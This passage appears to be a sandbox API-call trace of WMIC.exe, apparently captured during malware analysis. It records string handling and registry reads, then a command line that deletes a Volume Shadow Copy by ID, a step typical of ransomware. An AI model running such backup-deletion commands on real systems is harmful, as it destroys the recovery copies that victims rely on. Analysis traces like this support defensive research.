(param_1="ANONYMOUS") returned 0x9 [0098.572] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0098.572] SysStringLen (param_1="IDENTIFY") returned 0x8 [0098.572] malloc (_Size=0x30) returned 0x246ae0 [0098.572] malloc (_Size=0x18) returned 0x246b20 [0098.572] SysStringLen (param_1="IMPERSONATE") returned 0xb [0098.572] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0098.572] SysStringLen (param_1="IMPERSONATE") returned 0xb [0098.572] SysStringLen (param_1="IDENTIFY") returned 0x8 [0098.573] SysStringLen (param_1="IDENTIFY") returned 0x8 [0098.573] SysStringLen (param_1="IMPERSONATE") returned 0xb [0098.573] malloc (_Size=0x30) returned 0x246b40 [0098.573] malloc (_Size=0x18) returned 0x246b80 [0098.573] SysStringLen (param_1="DELEGATE") returned 0x8 [0098.573] SysStringLen (param_1="IDENTIFY") returned 0x8 [0098.573] SysStringLen (param_1="DELEGATE") returned 0x8 [0098.573] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0098.573] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0098.573] SysStringLen (param_1="DELEGATE") returned 0x8 [0098.573] malloc (_Size=0x30) returned 0x246ba0 [0098.573] malloc (_Size=0x18) returned 0x246be0 [0098.573] malloc (_Size=0x30) returned 0x246c00 [0098.573] malloc (_Size=0x18) returned 0x246c40 [0098.573] SysStringLen (param_1="NONE") returned 0x4 [0098.573] SysStringLen (param_1="DEFAULT") returned 0x7 [0098.573] SysStringLen (param_1="DEFAULT") returned 0x7 [0098.573] SysStringLen (param_1="NONE") returned 0x4 [0098.573] malloc (_Size=0x30) returned 0x246c60 [0098.573] malloc (_Size=0x18) returned 0x246ca0 [0098.573] SysStringLen (param_1="CONNECT") returned 0x7 [0098.573] SysStringLen (param_1="DEFAULT") returned 0x7 [0098.573] malloc (_Size=0x30) returned 0x246cc0 [0098.573] malloc (_Size=0x18) returned 0x246d00 [0098.573] SysStringLen (param_1="CALL") returned 0x4 [0098.573] SysStringLen (param_1="DEFAULT") returned 0x7 [0098.573] SysStringLen (param_1="CALL") returned 0x4 [0098.573] SysStringLen (param_1="CONNECT") returned 0x7 [0098.573] malloc (_Size=0x30) returned 0x246d20 [0098.573] malloc (_Size=0x18) returned 0x246d60 [0098.574] SysStringLen (param_1="PKT") returned 0x3 [0098.574] SysStringLen (param_1="DEFAULT") returned 0x7 [0098.574] SysStringLen (param_1="PKT") returned 0x3 [0098.574] SysStringLen (param_1="NONE") returned 0x4 [0098.574] SysStringLen (param_1="NONE") returned 0x4 [0098.574] SysStringLen (param_1="PKT") returned 0x3 [0098.574] malloc (_Size=0x30) returned 0x246d80 [0098.574] malloc (_Size=0x18) returned 0x246dc0 [0098.574] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0098.574] SysStringLen (param_1="DEFAULT") returned 0x7 [0098.574] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0098.574] SysStringLen (param_1="NONE") returned 0x4 [0098.574] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0098.574] SysStringLen (param_1="PKT") returned 0x3 [0098.574] SysStringLen (param_1="PKT") returned 0x3 [0098.574] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0098.574] malloc (_Size=0x30) returned 0x248000 [0098.574] malloc (_Size=0x18) returned 0x246de0 [0098.575] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0098.575] SysStringLen (param_1="DEFAULT") returned 0x7 [0098.575] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0098.575] SysStringLen (param_1="PKT") returned 0x3 [0098.575] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0098.575] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0098.575] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0098.575] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0098.575] malloc (_Size=0x30) returned 0x248040 [0098.575] malloc (_Size=0x40) returned 0x246e00 [0098.575] malloc (_Size=0x20a) returned 0x246e50 [0098.575] GetSystemDirectoryW (in: lpBuffer=0x246e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0098.575] free (_Block=0x246e50) [0098.575] malloc (_Size=0x18) returned 0x246e50 [0098.575] malloc (_Size=0x18) returned 0x246e70 [0098.575] malloc (_Size=0x18) returned 0x246e90 [0098.575] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0098.575] SysStringLen (param_1="\\wbem\\") returned 0x6 [0098.575] free (_Block=0x246e50) [0098.575] free (_Block=0x246e70) [0098.575] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0098.575] free (_Block=0x246e90) [0098.575] malloc (_Size=0x18) returned 0x246e50 [0098.575] malloc (_Size=0x18) returned 0x246e70 [0098.576] malloc (_Size=0x18) returned 0x246e90 [0098.576] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0098.576] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0098.576] free (_Block=0x246e50) [0098.576] free (_Block=0x246e70) [0098.576] GetCurrentThreadId () returned 0x90c [0098.576] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x18ef00 | out: phkResult=0x18ef00*=0xf8) returned 0x0 [0098.576] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x18ef50, lpcbData=0x18eef0*=0x400 | out: lpType=0x0, lpData=0x18ef50*=0x30, lpcbData=0x18eef0*=0x4) returned 0x0 [0098.576] _wcsicmp (_String1="0", _String2="1") returned -1 [0098.576] _wcsicmp (_String1="0", _String2="2") returned -2 [0098.576] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x18eef0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x18eef0*=0x42) returned 0x0 [0098.576] malloc (_Size=0x86) returned 0x246eb0 [0098.576] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x246eb0, lpcbData=0x18eef0*=0x42 | out: lpType=0x0, lpData=0x246eb0*=0x25, lpcbData=0x18eef0*=0x42) returned 0x0 [0098.576] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0098.576] malloc (_Size=0x42) returned 0x246f40 [0098.576] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0098.576] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x18ef50, lpcbData=0x18eef0*=0x400 | out: lpType=0x0, lpData=0x18ef50*=0x36, lpcbData=0x18eef0*=0xc) returned 0x0 [0098.576] _wtol (_String="65536") returned 65536 [0098.576] free (_Block=0x246eb0) [0098.576] RegCloseKey (hKey=0x0) returned 0x6 [0098.576] CoCreateInstance (in: rclsid=0xff1d7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff1d73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x18f3f8 | out: ppv=0x18f3f8*=0x1dc71d0) returned 0x0 [0098.592] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x1dc71d0, xmlSource=0x18f540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x246e50), isSuccessful=0x18f5b0 | out: isSuccessful=0x18f5b0*=0xffff) returned 0x0 [0098.710] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1dc71d0, DOMElement=0x18f3f0 | out: DOMElement=0x18f3f0) returned 0x0 [0098.710] malloc (_Size=0x18) returned 0x246e50 [0098.711] free (_Block=0x246e50) [0098.711] malloc (_Size=0x18) returned 0x246e50 [0098.711] free (_Block=0x246e50) [0098.711] malloc (_Size=0x18) returned 0x246e50 [0098.711] malloc (_Size=0x18) returned 0x246e70 [0098.711] malloc (_Size=0x30) returned 0x248080 [0098.711] malloc (_Size=0x18) returned 0x246eb0 [0098.711] free (_Block=0x246eb0) [0098.712] malloc (_Size=0x18) returned 0x24c560 [0098.712] malloc (_Size=0x18) returned 0x24c580 [0098.712] SysStringLen (param_1="VALUE") returned 0x5 [0098.712] SysStringLen (param_1="TABLE") returned 0x5 [0098.712] SysStringLen (param_1="TABLE") returned 0x5 [0098.712] SysStringLen (param_1="VALUE") returned 0x5 [0098.712] malloc (_Size=0x30) returned 0x2480c0 [0098.712] malloc (_Size=0x18) returned 0x24c5a0 [0098.712] free (_Block=0x24c5a0) [0098.712] malloc (_Size=0x18) returned 0x24c5a0 [0098.712] malloc (_Size=0x18) returned 0x24c5c0 [0098.712] SysStringLen (param_1="LIST") returned 0x4 [0098.712] SysStringLen (param_1="TABLE") returned 0x5 [0098.712] malloc (_Size=0x30) returned 0x248100 [0098.713] malloc (_Size=0x18) returned 0x24c5e0 [0098.713] free (_Block=0x24c5e0) [0098.713] malloc (_Size=0x18) returned 0x24c5e0 [0098.713] malloc (_Size=0x18) returned 0x24c600 [0098.713] SysStringLen (param_1="RAWXML") returned 0x6 [0098.713] SysStringLen (param_1="TABLE") returned 0x5 [0098.713] SysStringLen (param_1="RAWXML") returned 0x6 [0098.713] SysStringLen (param_1="LIST") returned 0x4 [0098.713] SysStringLen (param_1="LIST") returned 0x4 [0098.713] SysStringLen (param_1="RAWXML") returned 0x6 [0098.713] malloc (_Size=0x30) returned 0x248140 [0098.713] malloc (_Size=0x18) returned 0x24c620 [0098.713] free (_Block=0x24c620) [0098.713] malloc (_Size=0x18) returned 0x24c620 [0098.713] malloc (_Size=0x18) returned 0x24c640 [0098.713] SysStringLen (param_1="HTABLE") returned 0x6 [0098.713] SysStringLen (param_1="TABLE") returned 0x5 [0098.713] SysStringLen (param_1="HTABLE") returned 0x6 [0098.713] SysStringLen (param_1="LIST") returned 0x4 [0098.714] malloc (_Size=0x30) returned 0x248180 [0098.714] malloc (_Size=0x18) returned 0x24c660 [0098.714] free (_Block=0x24c660) [0098.714] malloc (_Size=0x18) returned 0x24c660 [0098.714] malloc (_Size=0x18) returned 0x24c680 [0098.714] SysStringLen (param_1="HFORM") returned 0x5 [0098.714] SysStringLen (param_1="TABLE") returned 0x5 [0098.714] SysStringLen (param_1="HFORM") returned 0x5 [0098.714] SysStringLen (param_1="LIST") returned 0x4 [0098.714] SysStringLen (param_1="HFORM") returned 0x5 [0098.714] SysStringLen (param_1="HTABLE") returned 0x6 [0098.714] malloc (_Size=0x30) returned 0x2481c0 [0098.714] malloc (_Size=0x18) returned 0x24c6a0 [0098.715] free (_Block=0x24c6a0) [0098.715] malloc (_Size=0x18) returned 0x24c6a0 [0098.715] malloc (_Size=0x18) returned 0x24c6c0 [0098.715] SysStringLen (param_1="XML") returned 0x3 [0098.715] SysStringLen (param_1="TABLE") returned 0x5 [0098.715] SysStringLen (param_1="XML") returned 0x3 [0098.715] SysStringLen (param_1="VALUE") returned 0x5 [0098.715] SysStringLen (param_1="VALUE") returned 0x5 [0098.715] SysStringLen (param_1="XML") returned 0x3 [0098.715] malloc (_Size=0x30) returned 0x248200 [0098.715] malloc (_Size=0x18) returned 0x24c6e0 [0098.715] free (_Block=0x24c6e0) [0098.715] malloc (_Size=0x18) returned 0x24c6e0 [0098.715] malloc (_Size=0x18) returned 0x24c700 [0098.715] SysStringLen (param_1="MOF") returned 0x3 [0098.715] SysStringLen (param_1="TABLE") returned 0x5 [0098.716] SysStringLen (param_1="MOF") returned 0x3 [0098.716] SysStringLen (param_1="LIST") returned 0x4 [0098.716] SysStringLen (param_1="MOF") returned 0x3 [0098.716] SysStringLen (param_1="RAWXML") returned 0x6 [0098.716] SysStringLen (param_1="LIST") returned 0x4 [0098.716] SysStringLen (param_1="MOF") returned 0x3 [0098.716] malloc (_Size=0x30) returned 0x248240 [0098.716] malloc (_Size=0x18) returned 0x24c720 [0098.716] free (_Block=0x24c720) [0098.716] malloc (_Size=0x18) returned 0x24c720 [0098.716] malloc (_Size=0x18) returned 0x24c740 [0098.716] SysStringLen (param_1="CSV") returned 0x3 [0098.716] SysStringLen (param_1="TABLE") returned 0x5 [0098.716] SysStringLen (param_1="CSV") returned 0x3 [0098.716] SysStringLen (param_1="LIST") returned 0x4 [0098.716] SysStringLen (param_1="CSV") returned 0x3 [0098.716] SysStringLen (param_1="HTABLE") returned 0x6 [0098.716] SysStringLen (param_1="CSV") returned 0x3 [0098.716] SysStringLen (param_1="HFORM") returned 0x5 [0098.716] malloc (_Size=0x30) returned 0x248280 [0098.717] malloc (_Size=0x18) returned 0x24c760 [0098.717] free (_Block=0x24c760) [0098.717] malloc (_Size=0x18) returned 0x24c760 [0098.717] malloc (_Size=0x18) returned 0x24c780 [0098.717] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.717] SysStringLen (param_1="TABLE") returned 0x5 [0098.717] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.717] SysStringLen (param_1="VALUE") returned 0x5 [0098.717] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.717] SysStringLen (param_1="XML") returned 0x3 [0098.717] SysStringLen (param_1="XML") returned 0x3 [0098.717] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.717] malloc (_Size=0x30) returned 0x2482c0 [0098.717] malloc (_Size=0x18) returned 0x24c7a0 [0098.717] free (_Block=0x24c7a0) [0098.717] malloc (_Size=0x18) returned 0x24c7a0 [0098.718] malloc (_Size=0x18) returned 0x24c7c0 [0098.718] SysStringLen (param_1="texttablewsys") returned 0xd [0098.718] SysStringLen (param_1="TABLE") returned 0x5 [0098.718] SysStringLen (param_1="texttablewsys") returned 0xd [0098.718] SysStringLen (param_1="XML") returned 0x3 [0098.718] SysStringLen (param_1="texttablewsys") returned 0xd [0098.718] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.718] SysStringLen (param_1="XML") returned 0x3 [0098.718] SysStringLen (param_1="texttablewsys") returned 0xd [0098.718] malloc (_Size=0x30) returned 0x248300 [0098.718] malloc (_Size=0x18) returned 0x24c7e0 [0098.718] free (_Block=0x24c7e0) [0098.718] malloc (_Size=0x18) returned 0x24c7e0 [0098.718] malloc (_Size=0x18) returned 0x24c800 [0098.718] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.718] SysStringLen (param_1="TABLE") returned 0x5 [0098.718] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.718] SysStringLen (param_1="XML") returned 0x3 [0098.718] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.718] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.719] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.719] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.719] malloc (_Size=0x30) returned 0x248340 [0098.719] malloc (_Size=0x18) returned 0x24c820 [0098.719] free (_Block=0x24c820) [0098.719] malloc (_Size=0x18) returned 0x24c820 [0098.719] malloc (_Size=0x18) returned 0x24c840 [0098.719] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.719] SysStringLen (param_1="TABLE") returned 0x5 [0098.719] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.719] SysStringLen (param_1="XML") returned 0x3 [0098.719] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.719] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.719] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.719] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.719] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.719] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.719] malloc (_Size=0x30) returned 0x248380 [0098.720] malloc (_Size=0x18) returned 0x24c860 [0098.720] free (_Block=0x24c860) [0098.720] malloc (_Size=0x18) returned 0x24c860 [0098.720] malloc (_Size=0x18) returned 0x24c880 [0098.720] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.720] SysStringLen (param_1="TABLE") returned 0x5 [0098.720] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.720] SysStringLen (param_1="XML") returned 0x3 [0098.720] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.720] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.720] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.720] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.720] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.720] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.720] malloc (_Size=0x30) returned 0x2483c0 [0098.720] malloc (_Size=0x18) returned 0x24c8a0 [0098.720] free (_Block=0x24c8a0) [0098.721] malloc (_Size=0x18) returned 0x24c8a0 [0098.721] malloc (_Size=0x18) returned 0x24c8c0 [0098.721] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0098.721] SysStringLen (param_1="TABLE") returned 0x5 [0098.721] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0098.721] SysStringLen (param_1="XML") returned 0x3 [0098.721] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0098.721] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.721] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0098.721] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.721] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0098.721] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.721] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.721] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0098.721] malloc (_Size=0x30) returned 0x248400 [0098.721] malloc (_Size=0x18) returned 0x24c8e0 [0098.721] free (_Block=0x24c8e0) [0098.721] malloc (_Size=0x18) returned 0x24c8e0 [0098.721] malloc (_Size=0x18) returned 0x24c900 [0098.721] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0098.722] SysStringLen (param_1="TABLE") returned 0x5 [0098.722] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0098.722] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.722] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0098.722] SysStringLen (param_1="XML") returned 0x3 [0098.722] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0098.722] SysStringLen (param_1="texttablewsys") returned 0xd [0098.722] SysStringLen (param_1="XML") returned 0x3 [0098.722] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0098.722] malloc (_Size=0x30) returned 0x248440 [0098.722] malloc (_Size=0x18) returned 0x24c920 [0098.722] free (_Block=0x24c920) [0098.722] malloc (_Size=0x18) returned 0x24c920 [0098.722] malloc (_Size=0x18) returned 0x24c940 [0098.722] SysStringLen (param_1="htable-sortby") returned 0xd [0098.722] SysStringLen (param_1="TABLE") returned 0x5 [0098.722] SysStringLen (param_1="htable-sortby") returned 0xd [0098.722] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.722] SysStringLen (param_1="htable-sortby") returned 0xd [0098.722] SysStringLen (param_1="XML") returned 0x3 [0098.722] SysStringLen (param_1="htable-sortby") returned 0xd [0098.722] SysStringLen (param_1="texttablewsys") returned 0xd [0098.722] SysStringLen (param_1="htable-sortby") returned 0xd [0098.723] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0098.723] SysStringLen (param_1="XML") returned 0x3 [0098.723] SysStringLen (param_1="htable-sortby") returned 0xd [0098.723] malloc (_Size=0x30) returned 0x248480 [0098.723] malloc (_Size=0x18) returned 0x24c960 [0098.723] free (_Block=0x24c960) [0098.723] malloc (_Size=0x18) returned 0x24c960 [0098.723] malloc (_Size=0x18) returned 0x24c980 [0098.723] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0098.723] SysStringLen (param_1="TABLE") returned 0x5 [0098.723] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0098.723] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.723] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0098.723] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.723] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0098.723] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.723] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.724] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0098.724] malloc (_Size=0x30) returned 0x2484c0 [0098.724] malloc (_Size=0x18) returned 0x24c9a0 [0098.724] free (_Block=0x24c9a0) [0098.724] malloc (_Size=0x18) returned 0x24c9a0 [0098.724] malloc (_Size=0x18) returned 0x24c9c0 [0098.724] SysStringLen (param_1="wmiclimofformat") returned 0xf [0098.724] SysStringLen (param_1="TABLE") returned 0x5 [0098.724] SysStringLen (param_1="wmiclimofformat") returned 0xf [0098.724] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.724] SysStringLen (param_1="wmiclimofformat") returned 0xf [0098.724] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.724] SysStringLen (param_1="wmiclimofformat") returned 0xf [0098.724] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.724] SysStringLen (param_1="wmiclimofformat") returned 0xf [0098.724] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0098.724] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.724] SysStringLen (param_1="wmiclimofformat") returned 0xf [0098.724] malloc (_Size=0x30) returned 0x248500 [0098.725] malloc (_Size=0x18) returned 0x24c9e0 [0098.725] free (_Block=0x24c9e0) [0098.725] malloc (_Size=0x18) returned 0x24c9e0 [0098.725] malloc (_Size=0x18) returned 0x24ca00 [0098.725] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0098.725] SysStringLen (param_1="TABLE") returned 0x5 [0098.725] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0098.725] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.725] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0098.725] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.725] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0098.725] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.725] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.725] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0098.725] malloc (_Size=0x30) returned 0x248540 [0098.725] malloc (_Size=0x18) returned 0x24ca20 [0098.726] free (_Block=0x24ca20) [0098.726] malloc (_Size=0x18) returned 0x24ca20 [0098.726] malloc (_Size=0x18) returned 0x24ca40 [0098.726] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0098.726] SysStringLen (param_1="TABLE") returned 0x5 [0098.726] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0098.726] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.726] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0098.726] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.726] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0098.726] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.726] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0098.726] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0098.726] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.726] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0098.726] malloc (_Size=0x30) returned 0x248580 [0098.726] FreeThreadedDOMDocument:IUnknown:Release (This=0x1dc71d0) returned 0x0 [0098.726] free (_Block=0x246e90) [0098.726] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete" [0098.727] malloc (_Size=0xe0) returned 0x24cd30 [0098.727] memcpy_s (in: _Destination=0x24cd30, _DestinationSize=0xde, _Source=0x3125be, _SourceSize=0xd0 | out: _Destination=0x24cd30) returned 0x0 [0098.727] malloc (_Size=0x18) returned 0x24ca60 [0098.727] malloc (_Size=0x18) returned 0x24ca80 [0098.727] malloc (_Size=0x18) returned 0x24caa0 [0098.727] malloc (_Size=0x18) returned 0x24cac0 [0098.727] malloc (_Size=0x80) returned 0x246e90 [0098.727] GetLocalTime (in: lpSystemTime=0x18f590 | out: lpSystemTime=0x18f590*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x3, wMilliseconds=0x125)) [0098.727] _vsnwprintf (in: _Buffer=0x246e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x18f4e8 | out: _Buffer="09-04-2020T08:55:03") returned 19 [0098.727] lstrlenW (lpString=" shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete") returned 71 [0098.727] malloc (_Size=0x90) returned 0x2470a0 [0098.727] lstrlenW (lpString=" shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete") returned 71 [0098.727] lstrlenW (lpString=" shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete") returned 71 [0098.727] malloc (_Size=0x90) returned 0x24ce20 [0098.727] lstrlenW (lpString=" shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete") returned 71 [0098.727] lstrlenW (lpString=" shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete") returned 71 [0098.727] lstrlenW (lpString=" shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete") returned 71 [0098.728] malloc (_Size=0x16) returned 0x24cae0 [0098.728] lstrlenW (lpString="shadowcopy") returned 10 [0098.728] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0098.728] malloc (_Size=0x16) returned 0x24cb00 [0098.728] malloc (_Size=0x8) returned 0x247140 [0098.728] free (_Block=0x0) [0098.728] free (_Block=0x24cae0) [0098.728] lstrlenW (lpString=" shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete") returned 71 [0098.728] malloc (_Size=0xc) returned 0x24cae0 [0098.728] lstrlenW (lpString="where") returned 5 [0098.728] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0098.728] malloc (_Size=0xc) returned 0x24cb20 [0098.728] malloc (_Size=0x10) returned 0x24cb40 [0098.728] memmove_s (in: _Destination=0x24cb40, _DestinationSize=0x8, _Source=0x247140, _SourceSize=0x8 | out: _Destination=0x24cb40) returned 0x0 [0098.728] free (_Block=0x247140) [0098.728] free (_Block=0x0) [0098.728] free (_Block=0x24cae0) [0098.728] lstrlenW (lpString=" shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete") returned 71 [0098.728] malloc (_Size=0x5c) returned 0x24cec0 [0098.728] lstrlenW (lpString="\"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\"") returned 45 [0098.728] _wcsicmp (_String1="\"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\"", _String2="\"NULL\"") returned -5 [0098.728] lstrlenW (lpString="\"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\"") returned 45 [0098.728] lstrlenW (lpString="\"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\"") returned 45 [0098.728] malloc (_Size=0x5c) returned 0x24cf30 [0098.728] malloc (_Size=0x18) returned 0x24cae0 [0098.728] memmove_s (in: _Destination=0x24cae0, _DestinationSize=0x10, _Source=0x24cb40, _SourceSize=0x10 | out: _Destination=0x24cae0) returned 0x0 [0098.728] free (_Block=0x24cb40) [0098.728] free (_Block=0x0) [0098.728] free (_Block=0x24cec0) [0098.729] lstrlenW (lpString=" shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete") returned 71 [0098.729] malloc (_Size=0xe) returned 0x24cb40 [0098.729] lstrlenW (lpString="delete") returned 6 [0098.729] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0098.729] malloc (_Size=0xe) returned 0x24cb60 [0098.729] malloc (_Size=0x20) returned 0x24cec0 [0098.729] memmove_s (in: _Destination=0x24cec0, _DestinationSize=0x18, _Source=0x24cae0, _SourceSize=0x18 | out: _Destination=0x24cec0) returned 0x0 [0098.729] free (_Block=0x24cae0) [0098.729] free (_Block=0x0) [0098.729] free (_Block=0x24cb40) [0098.729] malloc (_Size=0x20) returned 0x24cef0 [0098.729] lstrlenW (lpString="QUIT") returned 4 [0098.729] lstrlenW (lpString="shadowcopy") returned 10 [0098.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0098.729] lstrlenW (lpString="EXIT") returned 4 [0098.729] lstrlenW 